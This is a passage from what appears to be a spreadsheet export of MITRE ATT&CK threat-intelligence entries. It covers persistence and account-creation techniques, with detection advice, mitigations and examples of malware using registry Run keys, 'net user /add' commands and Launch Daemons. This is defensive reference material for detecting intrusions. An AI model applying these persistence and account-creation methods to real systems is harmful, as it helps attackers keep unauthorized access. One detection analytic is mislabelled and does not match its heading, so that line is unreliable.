One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys: &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt; &lt;br&gt;&lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;(Citation: F-Secure CozyDuke)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can add Registry run keys for persistence.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
CrossRAT
[CrossRAT](https://attack.mitre.org/software/S0235) uses run keys for persistence on Windows.(Citation: Lookout Dark Caracal Jan 2018)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) adds several Registry entries to enable automatic execution at every system startup.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Run` registry key and by creating a .lnk shortcut file in the Windows startup folder.(Citation: Secureworks DarkTortilla Aug 2022)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021) can write itself to the Startup folder to gain persistence.(Citation: Zscaler Lyceum DnsSystem June 2022)
DownPaper
[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell to add a Registry Run key in order to establish persistence.(Citation: ClearSky Charming Kitten Dec 2017)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) achieves persistence by creating a Registry entry in &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: DustySky)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can achieve persistence through the Registry Run key.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)
Elise
If establishing persistence by installation as a new service fails, one variant of [Elise](https://attack.mitre.org/software/S0081) establishes persistence for the created .exe file by setting the following Registry key: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe&lt;/code&gt;. Other variants have set the following Registry keys for persistence: &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : [self]&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAStorD&lt;/code&gt;.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)
Emissary
Variants of [Emissary](https://attack.mitre.org/software/S0082) have added Run Registry keys to establish persistence.(Citation: Emissary Trojan Feb 2016)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed adding the downloaded payload to the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key to maintain persistence.(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Picus Emotet Dec 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) can modify the registry run keys &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Github PowerShell Empire)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has created Registry keys for persistence in &lt;code&gt;[HKLM|HKCU]\…\CurrentVersion\Run&lt;/code&gt;.(Citation: Cyphort EvilBunny Dec 2014)	
EvilGrab
[EvilGrab](https://attack.mitre.org/software/S0152) adds a Registry Run key for ctfmon.exe to establish persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) adds a shortcut file to the startup folder for persistence.(Citation: ESET GreyEnergy Oct 2018)
FLASHFLOOD
[FLASHFLOOD](https://attack.mitre.org/software/S0036) achieves persistence by making an entry in the Registry's Run key.(Citation: FireEye APT30)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) has used &lt;code&gt;HKLM\SOFTWARE\Microsoft\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: ESET Dukes October 2019)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) establishes persistence by creating the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\Run&lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Final1stspy
[Final1stspy](https://attack.mitre.org/software/S0355) creates a Registry Run key to establish persistence.(Citation: Unit 42 Nokki Oct 2018)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has dropped an executable file to the startup directory.(Citation: NTT Security Flagpro new December 2021) 
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has established persistence via the `HKCU\SOFTWARE\microsoft\windows\currentversion\run` registry key.(Citation: Korean FSI TA505 2020)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can use a Registry Run Key and the Startup folder to establish persistence.(Citation: Bitdefender FunnyDream Campaign November 2020)
GRIFFON
[GRIFFON](https://attack.mitre.org/software/S0417) has used a persistence module that stores the implant inside the Registry, which executes at logon.(Citation: SecureList Griffon May 2019)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can set persistence with a Registry run key.(Citation: ESET Gelsemium June 2021)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) establishes persistence in the Startup folder.(Citation: McAfee Gold Dragon)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can use run keys and create link files in the startup folde</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that are associated with account creation, such as net user or useradd
Process Creation
Monitor newly executed processes associated with account creation, such as net.exe 
User Account Creation
Monitor for newly constructed user accounts through account audits to detect suspicious accounts that may have been created by an adversary. Collect data on account creation within a network or Windows Event ID 4720 (for when a user account is created on a Windows system and domain controller).
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts.
Network Segmentation
Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.
Operating System Configuration
Protect domain controllers by ensuring proper security configuration for critical servers.
Privileged Account Management
Limit the number of accounts with permissions to create other accounts. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) added a login to a SQL Server with `sp_addlinkedsrvlogin`.(Citation: Dragos Crashoverride 2018)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) used &lt;code&gt;wmic.exe&lt;/code&gt; to add a new user to the system.(Citation: Symantec WastedLocker June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">User Account Creation
Monitor for newly constructed user accounts through the collection of usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts, such as accounts that do not follow specified naming conventions or accounts created by unapproved users or sources.(Citation: Microsoft Azure Active Directory security operations guide) Monitor for newly created admin accounts that go over a certain threshold of known admins.
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts.
Network Segmentation
Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.
Privileged Account Management
Limit the number of accounts with permissions to create other accounts. Do not allow privileged accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
APT29
[APT29](https://attack.mitre.org/groups/G0016) can create new users through Azure AD.(Citation: MSTIC Nobelium Oct 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has created global admin accounts in the targeted organization's cloud instances to gain persistence.(Citation: MSTIC DEV-0537 Mar 2022)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can create new Azure AD users.(Citation: AADInternals Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files that may modify client software binaries to establish persistent access to systems.
File Deletion
Monitor for unexpected deletion of  client software binaries to establish persistent access to systems.
File Metadata
Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment
File Modification
Monitor changes to client software that do not correlate with known software or patch cycles.
Code Signing
Ensure all application component binaries are signed by the correct application developers.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used a trojanized version of Windows Notepad to add a layer of persistence for [Industroyer](https://attack.mitre.org/software/S0604).(Citation: ESET Industroyer)
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has been embedded into modified OpenSSH binaries to gain persistent access to SSH credential information.(Citation: ESET Ebury Feb 2014)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.(Citation: ESET Industroyer)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.(Citation: ESET Kobalos Jan 2021)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) searches through the &lt;code&gt;/Users/&lt;/code&gt; folder looking for executable files. For each executable, [ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of the file. When the file is executed, the [ThiefQuest](https://attack.mitre.org/software/S0595) code is executed first. [ThiefQuest](https://attack.mitre.org/software/S0595) creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add /domain.
Process Creation
Monitor newly executed processes associated with account creation, such as net.exe
User Account Creation
Monitor for newly constructed user accounts through account audits to detect suspicious accounts that may have been created by an adversary. Collect data on account creation within a network or Windows Event ID 4720 (for when a user account is created on a Windows system and domain controller).
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts.
Network Segmentation
Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.
Operating System Configuration
Protect domain controllers by ensuring proper security configuration for critical servers.
Privileged Account Management
Limit the number of accounts with permissions to create other accounts. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) created privileged domain accounts to be used for further exploitation and lateral movement. (Citation: Booz Allen Hamilton)
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) created two new accounts, “admin” and “система” (System). The accounts were then assigned to a domain matching local operation and were delegated new privileges.(Citation: Dragos Crashoverride 2018)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) created high-privileged domain user accounts to maintain access to victim networks.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has created domain accounts.(Citation: Volexity Exchange Marauder March 2021)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has created and used new accounts within a victim's Active Directory environment to maintain persistence.(Citation: Mandiant FIN12 Oct 2021)
Empire
[Empire](https://attack.mitre.org/software/S0363) has a module for creating a new domain user if permissions allow.(Citation: Github PowerShell Empire)
Net
The &lt;code&gt;net user username \password \domain&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a domain account.(Citation: Savill 1999)
PsExec
[PsExec](https://attack.mitre.org/software/S0029) has the ability to remotely create accounts on target systems.(Citation: NCC Group Fivehands June 2021)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create domain accounts.(Citation: GitHub Pupy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that are associated with local account creation, such as `net user /add`, `useradd`, `dscl -create`, and `kubectl create serviceaccount`.
Process Creation
Monitor newly executed processes associated with account creation, such as net.exe
&lt;h4&gt;Analytic 1 - Create local admin accounts using net.exe &lt;/h4&gt;
&lt;code&gt;certutil_downloads = filter processes where (
  (exe = C:\Windows\System32\net.exe OR exe = C:\Windows\System32\net1.exe ) AND command_line = * -exportPFX * )&lt;/code&gt;
User Account Creation
Monitor for newly constructed user and service accounts through account audits to detect suspicious accounts that may have been created by an adversary. Collect data on account creation within a network, a Kubernetes cluster, or Windows Event ID 4720 (for when a user account is created on a Windows system and domain controller).
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts.
Privileged Account Management
Limit the number of accounts permitted to create other accounts. Limit the usage of local administrator accounts to be used for day-to-day operations that may expose them to potential adversaries.
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to create or enable accounts, such as &lt;code&gt;support_388945a0&lt;/code&gt;.(Citation: aptsim)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has created accounts on multiple compromised hosts to perform actions within the network.(Citation: BitDefender Chafer May 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has created user accounts.(Citation: FireEye APT41 Aug 2019) 
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has created MS-SQL local accounts in a compromised network.(Citation: Sygnia Elephant Beetle Jan 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has created a local user account with administrator privileges.(Citation: ClearSky Pay2Kitten December 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has created accounts with &lt;code&gt;net user&lt;/code&gt;.(Citation: KISA Operation Muzabi)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called Imecab to set up a persistent remote access account on the victim machine.(Citation: Symantec Leafminer July 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has created local accounts named `help` and `DefaultAccount` on compromised machines.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has created local privileged users on victim machines.(Citation: Intezer TeamTNT September 2020)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has created local administrator accounts to maintain persistence in compromised networks.(Citation: Mandiant FIN12 Oct 2021)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) has the capability to add its own account to the victim's machine.(Citation: Symantec Calisto July 2018)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) can create a Windows account.(Citation: FireEye CARBANAK June 2017)
Empire
[Empire](https://attack.mitre.org/software/S0363) has a module for creating a local user if permissions allow.(Citation: Github PowerShell Empire)
Flame
[Flame](https://attack.mitre.org/software/S0143) can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) can create new users on an infected system.(Citation: Trustwave GoldenSpy June 2020)	
HiddenWasp
[HiddenWasp](https://attack.mitre.org/software/S0394) creates a user account as a means to provide initial persistence to the compromised machine.(Citation: Intezer HiddenWasp Map 2019)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has created a user named “monerodaemon”.(Citation: Unit 42 Hildegard Malware)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) may create a temporary user on the system named `Lost_{Unique Identifier}`.(Citation: Cylance Dust Storm)
Net
The &lt;code&gt;net user username \password&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a local account.(Citation: Savill 1999)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create local system accounts.(Citation: GitHub Pupy)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) may create a temporary user on the system named `Lost_{Unique Identifier}` with the password `pond~!@6”{Unique Identifier}`.(Citation: Cylance Dust Storm)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has created user accounts.(Citation: FireEye SMOKEDHAM June 2021)
ServHelper
[ServHelper](https://attack.mitre.org/software/S0382) has created a new user named "supportaccount".(Citation: Proofpoint TA505 Jan 2019)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has a feature to create local user accounts.(Citation: Talos ZxShell Oct 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">Image Creation
Monitor interactions with images and containers by users to identify ones that are added anomalously.
Image Metadata
Periodically baseline virtual machine images to identify malicious modifications or additions.
Image Modification
Monitor interactions with images and containers by users to identify ones that are modified anomalously.
In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration.
Audit
Periodically check the integrity of images and containers used in cloud deployments to ensure they have not been modified to include malicious software.
Code Signing
Several cloud service providers support content trust models that require container images be signed by trusted sources.(Citation: Content trust in Azure Container Registry)(Citation: Content trust in Docker)
Privileged Account Management
Limit permissions associated with creating and modifying platform images or containers based on the principle of least privilege.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Some legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to true, ensure the &lt;code&gt;Program&lt;/code&gt; parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as &lt;code&gt;Program&lt;/code&gt; and &lt;code&gt;ProgramArguments&lt;/code&gt; parameters but one must be present. (Citation: launchd Keywords for plists)
File Creation
Monitor for new files added to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder. The System LaunchDaemons are protected by SIP.
File Modification
Monitor files for changes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.
Process Creation
Monitor for newly executed processes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.
Service Creation
Monitor for newly constructed services may create or modify Launch Daemons to execute malicious payloads as part of persistence.
Service Modification
Monitor services for changes made to Launch Daemons to execute malicious payloads as part of persistence.
Audit
Use auditing tools capable of detecting folder permissions abuse opportunities on systems, especially reviewing changes made to folders by third-party software.
User Account Management
Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has placed a plist file within the &lt;code&gt;LaunchDaemons&lt;/code&gt; folder and launched it manually.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchDaemon.(Citation: MacKeeper Bundlore Apr 2019)
Dacls
[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a Launch Daemon.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can add a plist file in the `Library/LaunchDaemons` to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) adds plist files with the naming format &lt;code&gt;com.[random_name].plist&lt;/code&gt; in the &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; folder with the RunAtLoad and KeepAlive keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: ESET LoudMiner June 2019)
OSX_OCEANLOTUS.D
If running with &lt;code&gt;root&lt;/code&gt; permissions, [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: sentinelone apt32 macOS backdoor 2020)
ThiefQuest
When running with root privileges after a [Launch Agent](https://attack.mitre.org/techniques/T1543/001) is installed, [ThiefQuest](https://attack.mitre.org/software/S0595) installs a plist file to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; establishing persistence as a Launch Daemon. (Citation: wardle evilquest parti)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.
Driver Load
Monitor for unusual kernel driver installation activity that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.
File Creation
Monitor for newly constructed files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.
File Modification
Monitor for changes made to files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.
Kernel Module Load
Monitor for unusual kernel driver installation activity that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.
Module Load
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
OS API Execution
Monitor for API calls that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.
Process Creation
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data to increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Windows Registry Key Creation
Monitor for additions of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry.
Windows Registry Key Modification
Monitor for modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry.
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) established persistence by setting the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load&lt;/code&gt; registry key to point to its executable.(Citation: Checkpoint IndigoZebra July 2021)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567)’s RAT makes a persistent target file with auto execution on the host start.(Citation: Securelist Dtrack)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) has created registry keys for persistence, including `HKCU\Software\bkfouerioyou`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{6afa8072-b2b1-31a8-b5c1-{Unique Identifier}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3BF41072-B2B1-31A8-B5C1-{Unique Identifier}`.(Citation: Cylance Dust Storm)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) has created registry keys for persistence, including `HKCU\Software\dnimtsoleht\StubPath`, `HKCU\Software\snimtsOleht\StubPath`, `HKCU\Software\Backtsaleht\StubPath`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed. Components\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.(Citation: Cylance Dust Storm) 
xCaon
[xCaon](https://attack.mitre.org/software/S0653) has added persistence via the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load&lt;/code&gt; which causes the malware to run each time any user logs in.(Citation: Checkpoint IndigoZebra July 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Process Creation
Monitor newly executed processes that may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Windows Registry Key Creation
Monitor Registry key additions to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Windows Registry Key Modification
Monitor Registry key modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry key in the Active Setup pointing to a malicious executable.(Citation: Microsoft PoisonIvy 2017)(Citation: paloalto Tropic Trooper 2016)(Citation: FireEye Regsvr32 Targeting Mongolian Gov)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse authentication packages to execute DLLs when the system boots.
Module Load
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)
Windows Registry Key Modification
Monitor the Registry for changes to the LSA Registry keys. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)
Privileged Process Integrity
Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)
Flame
[Flame](https://attack.mitre.org/software/S0143) can use Windows Authentication Packages for persistence.(Citation: Crysys Skywiper)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
All login items created via shared file lists are viewable by using the System Preferences GUI or in the &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt; file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited.
File Modification
All login items created via shared file lists are viewable by using the System Preferences GUI or in the &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt; file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited.
Process Creation
Monitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior, such as establishing network connections.
Dok
[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to install a login Item by sending Apple events to the &lt;code&gt;System Events&lt;/code&gt; process.(Citation: hexed osx.dok analysis 2019)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can add [Login Items](https://attack.mitre.org/techniques/T1547/015) to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can persist via startup options for Login items.(Citation: Red Canary NETWIRE January 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft Outlook rules to obtain persistence on a compromised system. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Command Execution
Monitor executed commands and arguments that may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified PR_RULE_MSG_NAME and PR_RULE_MSG_PROVIDER properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules)
Process Creation
Monitor newly executed processes that may abuse Microsoft Outlook rules to obtain persistence on a compromised system.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)
Update Software
